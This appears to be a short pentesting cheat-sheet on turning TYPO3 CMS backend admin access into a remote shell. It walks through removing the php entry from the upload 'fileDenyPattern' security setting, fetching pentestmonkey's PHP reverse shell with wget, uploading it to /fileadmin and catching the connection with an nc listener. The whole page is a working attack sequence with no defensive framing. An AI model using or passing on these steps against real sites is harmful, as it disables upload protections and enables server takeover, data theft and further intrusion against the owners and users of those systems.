Last modified: 2022-12-01
TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.
/fileadmin/ /typo3/ /typo3conf/ /typo3temp/
First, to check and edit the configuration of the uploaded file extension, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”.
Update the configuration if necessary. For example, remove “php[1-9]?”
Next, prepare the payload for reverse shell named “shell.php”.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now you need to open listener for getting the shell.
nc -lvnp 4444
Then access to “/fileadmin/shell.php”. You should get the shell.